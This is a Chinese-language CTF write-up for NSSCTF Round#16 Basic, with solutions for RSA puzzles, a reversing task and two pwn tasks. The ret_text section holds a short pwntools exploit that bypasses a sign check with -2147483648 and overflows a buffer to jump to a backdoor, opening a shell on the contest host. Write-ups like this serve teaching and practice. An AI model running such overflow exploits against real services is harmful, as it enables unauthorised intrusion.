[NSSCTF Round#16 Basic] CPR

打着玩玩，比赛很简单。

Crypto

pr

一个RSA题，n1=p*q,n2=q*r给了两个c和p,r而且flag经过pad用单因子无法解出。分别用p,r解完再取crt

from Crypto.Util.number import *
import randomflag=plaintext = 'NSSCTF{****************}'
charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
padding_length = 100 - len(plaintext)for _ in range(padding_length):plaintext += random.choice(charset)public_exponent = 31413537523
message = bytes_to_long(plaintext.encode())
assert message > (1 << 512)
assert message < (1 << 1024)prime_p = getPrime(512)
prime_q = getPrime(512)
prime_r = getPrime(512)
n1 = prime_p * prime_q
n2 = prime_q * prime_r
ciphertext1 = pow(message, public_exponent, n1)
ciphertext2 = pow(message, public_exponent, n2)
print('c1=', ciphertext1)
print('c2=', ciphertext2)
print('p=', prime_p)
print('r=', prime_r)'''
c1= 36918910341116680090654563538246204134840776220077189276689868322808977412566781872132517635399441578464309667998925236488280867210758507758915311644529399878185776345227817559234605958783077866016808605942558810445187434690812992072238407431218047312484354859724174751718700409405142819140636116559320641695
c2= 15601788304485903964195122196382181273808496834343051747331984997977255326224514191280515875796224074672957848566506948553165091090701291545031857563686815297483181025074113978465751897596411324331847008870832527695258040104858667684793196948970048750296571273364559767074262996595282324974180754813257013752
p= 12101696894052331138951718202838643670037274599483776996203693662637821825873973767235442427190607145999472731101517998719984942030184683388441121181962123
r= 10199001137987151966640837133782537428248507382360655526592866939552984259171772190788036403425837649697437126360866173688083643144865107648483668545682383
'''

e = 31413537523
m1 = pow(c1, invert(e,p-1),p)
m2 = pow(c2, invert(e,r-1),r)
m = crt([int(m1),int(m2)],[p,r])
long_to_bytes(m)
#b'NSSCTF{yUanshEnx1ncHun2o23!}FA3JmflIoai8BxgdIGUQumsNc5R0hpo53zICaiWZRfjBj59P36EwC4CSfJOsZ3LIOYnhUmsQ'

break

给了私钥的一部分，用0281切开后发现给的是q,...猜e=0x10001直接解密即可，提交要换壳。

#部分私钥
a = '''Bc8tSTrvGJm2oYuCzIz+Yg4nwwKBgQDiYUawe5Y+rPbFhVOMVB8ZByfMa4LjeSDd
Z23jEGvylBHSeyvFCQq3ISUE40k1D2XmmeaZML3a1nUn6ORIWGaG2phcwrWLkR6n
ubVmb1QJSzgzmFHGnL56KHByZxD9q6DPB+o6gGWt8/6ddBl2NIZU/1btdPQgojfA
XXJFzR92RQKBgQC7qlB0U7m2U4FdG9eelSd+WSKNUVllZAuHji7jgh7Ox6La9xN5
miGZ1yvP44yX218OJ9Zi08o6vIrM6Eil45KzTtGm4iuIn8CMpox+5eUtoxyvxa9r
s2Wu+IRZN9zCME+p+qI8/TG27dIyDzsdgNqcUo8ESls7uW5/FEA7bYTCiQKBgQC7
1KybeB+kZ0zlfIdi8tVOpeI+uaHDbdh3+/5wHUsD3hmfg7VAag0q/2RA1vkB/oG1
QVLVHl0Yu0I/1/u5jyeakrtClAegAsvlrK+3i321rGS4YpTPb3SX1P/f3GZ7o7Ds
touA+NHk8IL9T7xkmJYw5h/RLG32ucH6aU6MXfLR5QKBgD/skfdFxGWxhHk6U1mS
27IM9jJNg9xLz5nxzkqPPhLn+rdgIIuTuQtv++eEjEP++7ZV10rg5yKVJd/bxy8H
2IN7aQo7kZWulHTQDZMFwgOhn0u6glJi+qC8bWzYDFOQSFrY9XQ3vwKMspqm+697
xM+dMUW0LML6oUE9ZjEiAY/5'''from base64 import *
for i in a.split():print(b64decode(i).hex())'''
05cf2d493aef1899b6a18b82cc8cfe620e27c302818100e26146b07b963eacf6c585538c541f190727cc6b82e37920dd
676de3106bf29411d27b2bc5090ab7212504e349350f65e699e69930bddad67527e8e448586686da985cc2b58b911ea7
b9b5666f54094b38339851c69cbe7a2870726710fdaba0cf07ea3a8065adf3fe9d741976348654ff56ed74f420a237c0
5d7245cd1f764502818100bbaa507453b9b653815d1bd79e95277e59228d515965640b878e2ee3821ecec7a2daf71379
9a2199d72bcfe38c97db5f0e27d662d3ca3abc8acce848a5e392b34ed1a6e22b889fc08ca68c7ee5e52da31cafc5af6b
b365aef8845937dcc2304fa9faa23cfd31b6edd2320f3b1d80da9c528f044a5b3bb96e7f14403b6d84c28902818100bb
d4ac9b781fa4674ce57c8762f2d54ea5e23eb9a1c36dd877fbfe701d4b03de199f83b5406a0d2aff6440d6f901fe81b5
4152d51e5d18bb423fd7fbb98f279a92bb429407a002cbe5acafb78b7db5ac64b86294cf6f7497d4ffdfdc667ba3b0ec
b68b80f8d1e4f082fd4fbc64989630e61fd12c6df6b9c1fa694e8c5df2d1e50281803fec91f745c465b184793a535992
dbb20cf6324d83dc4bcf99f1ce4a8f3e12e7fab760208b93b90b6ffbe7848c43fefbb655d74ae0e7229525dfdbc72f07
d8837b690a3b9195ae9474d00d9305c203a19f4bba825262faa0bc6d6cd80c5390485ad8f57437bf028cb29aa6fbaf7b
c4cf9d3145b42cc2faa1413d663122018ff9
#q,dp,dq,crt:(q-1)%p
02818100e26146b07b963eacf6c585538c541f190727cc6b82e37920dd676de3106bf29411d27b2bc5090ab7212504e349350f65e699e69930bddad67527e8e448586686da985cc2b58b911ea7b9b5666f54094b38339851c69cbe7a2870726710fdaba0cf07ea3a8065adf3fe9d741976348654ff56ed74f420a237c05d7245cd1f7645
02818100bbaa507453b9b653815d1bd79e95277e59228d515965640b878e2ee3821ecec7a2daf713799a2199d72bcfe38c97db5f0e27d662d3ca3abc8acce848a5e392b34ed1a6e22b889fc08ca68c7ee5e52da31cafc5af6bb365aef8845937dcc2304fa9faa23cfd31b6edd2320f3b1d80da9c528f044a5b3bb96e7f14403b6d84c289
02818100bbd4ac9b781fa4674ce57c8762f2d54ea5e23eb9a1c36dd877fbfe701d4b03de199f83b5406a0d2aff6440d6f901fe81b54152d51e5d18bb423fd7fbb98f279a92bb429407a002cbe5acafb78b7db5ac64b86294cf6f7497d4ffdfdc667ba3b0ecb68b80f8d1e4f082fd4fbc64989630e61fd12c6df6b9c1fa694e8c5df2d1e5
0281803fec91f745c465b184793a535992dbb20cf6324d83dc4bcf99f1ce4a8f3e12e7fab760208b93b90b6ffbe7848c43fefbb655d74ae0e7229525dfdbc72f07d8837b690a3b9195ae9474d00d9305c203a19f4bba825262faa0bc6d6cd80c5390485ad8f57437bf028cb29aa6fbaf7bc4cf9d3145b42cc2faa1413d663122018ff9
'''
q = 0x00e26146b07b963eacf6c585538c541f190727cc6b82e37920dd676de3106bf29411d27b2bc5090ab7212504e349350f65e699e69930bddad67527e8e448586686da985cc2b58b911ea7b9b5666f54094b38339851c69cbe7a2870726710fdaba0cf07ea3a8065adf3fe9d741976348654ff56ed74f420a237c05d7245cd1f7645
c = 6081370370545409218106271903400346695565292992689150366474451604281551878507114813906275593034729563149286993189430514737137534129570304832172520820901940874698337733991868650159489601159238582002010625666203730677577976307606665760650563172302688129824842780090723167480409842707790983962415315804311334507726664838464859751689906850572044873633896253285381878416855505301919877714965930289139921111644393144686543207867970807469735534838601255712764863973853116693691206791007433101433703535127367245739289103650669095061417223994665200039533840922696282929063608853551346533188464573323230476645532002621795338655
e = 0x10001
m = pow(c, invert(e, q-1),q)
long_to_bytes(m)
#b'flag{oi!_you_find___what_i_Wa1t_talK_y0n!!!}'
#NSSCTF{oi!_you_find___what_i_Wa1t_talK_y0n!!!}

PWN

nc_pwnre

nc后给出汇编和密文，加密很简单就是个异或，把结果base64解码后提交就进入shell

┌──(kali㉿kali)-[~/ctf/1223]
└─$ nc node7.anna.nssctf.cn 28164
pwn? re?no no no,this is just an easy nc-test.loc_40116D: 
mov     eax, [ebp+i]
add     eax, 1
mov     [ebp+i], eax
loc_401176:  
mov     ecx, [ebp+Str]
push    ecx
call    _strlen
add     esp, 4
cmp     [ebp+i], eax
jge     short loc_40119D
mov     edx, [ebp+Str]
add     edx, [ebp+i]
movsx   eax, byte ptr [edx]
xor     eax, 10h
mov     ecx, [ebp+Str]
add     ecx, [ebp+i]
mov     [ecx], al
jmp     short loc_40116D
maybe the result is talking about xor?
My result:
0x44,0x7c,0x5e,0x44,0x41,0x21,0x42,0x57,0x75,0x21,0x74,0x56,0x44,0x57,0x5d,0x67,0x44,0x46,0x29,0x45,0x5d,0x56,0x29,0x67,0x46,0x22,0x25,0x76,0x74,0x6a,0x52,0x69,0x5d,0x47,0x41,0x78,0x76,0x41,0x2d,0x2dyour answer?
NSSCTF{WELc0M_T0_pWn_w0r1d!}
You got it! Try to find the real flag!!!
ls
attachment
bin
dev
flag
lib
lib32
lib64
libx32
cat flag
NSSCTF{722dac10-45f0-4604-93cb-d196b71d7f30}

ret_text

名字就可以看出来是直接溢出到后门。这里有个判断v2<0 并且 -v2<0 就用-0x80000000绕过即可。

from pwn import *#p = process('./ret_text_v0')
p = remote('node1.anna.nssctf.cn', 28406)
context(arch='i386', log_level='debug')p.sendlineafter(b"Easy ret2text!!!Input:\n", b'-2147483648')
p.sendafter(b"OK!!!You are right.\n", b'\x00'*0x24 + p32(0x8049328))p.interactive()

Reverse

debugger

就是动调，把exit(0) nop掉后，打个断点，运行到这就看着flag了

a = '''347B46544353534E
2D37376132356434
3331342D61653239
662D346338392D65
3364663634383566
7D643738'''
b''.join([bytes.fromhex(i)[::-1] for i in a.split()])
b'NSSCTF{44d52a77-92ea-413e-98c4-ff5846fd387d}'

 CompileMe!

给了个c++的代码，让编译。有环境估计直接整就行，完成的人不多，说明window上安环境的人真不多。我也没有，不过程序比较简单一眼RC4，后边是个加减异或的加密共XXXXXX次，先把这块异出来写成函数。

lines = open('Program.cs','rb').readlines()a = b'def ccc(val):\n'
for line in lines:if line.startswith(b'            return val'):a += b'    val = '+line[18:]print(a)
open('c.py','wb').write(a)

然后在RC4解密（原来的程序就是解密程序，直接翻译成python）后调用ccc

from ctypes import *
from pwn import p64
from c import cccdef decrypt(v,key):v0 = c_uint64(v[0])v1 = c_uint64(v[1])delta = 0x9E3779B9sum1 = c_uint64((delta) * 32)for i in range(32):       v1.value -= (((v0.value << 4) ^ (v0.value >> 5)) + v0.value) ^ (sum1.value + key[(sum1.value >> 11) & 3])sum1.value -= delta       v0.value -= (((v1.value << 4) ^ (v1.value >> 5)) + v1.value) ^ (sum1.value + key[sum1.value & 3])return p64(ccc(v0.value)&0xffffffffffffffff)[::-1]+p64(ccc(v1.value)&0xffffffffffffffff)[::-1]enc = [0xc60b34b2bff9d34a, 0xf50af3aa8fd96c6b, 0x680ed11f0c05c4f1, 0x6e83b0a4aaf7c1a3, 0xd69b3d568695c3c5, 0xa88f4ff50a351da2, 0x5cfa195968e1bb5b, 0xc4168018d92196d9]
key = [0x57656c636f6d6520, 0x746f204e53534354, 0x4620526f756e6423, 0x3136204261736963]flag = b''
for i in range(0,8,2):flag += decrypt(enc[i:i+2],key)print(flag)
#NSSCTF{58MtU4iTx4uKu8PVHEYyY9a7tZ0daqVIfJVV9kpMRZ7uvDGYHRuJ58Mz}'''
v7 -= (((v8 << 4) ^ (v8 >> 5)) + v8) ^ (v4 + v16[(v4 >> 11) & 3]);
v4 -= v14;
v8 -= (((v7 << 4) ^ (v7 >> 5)) + v7) ^ (v4 + v16[v4 & 3]);
'''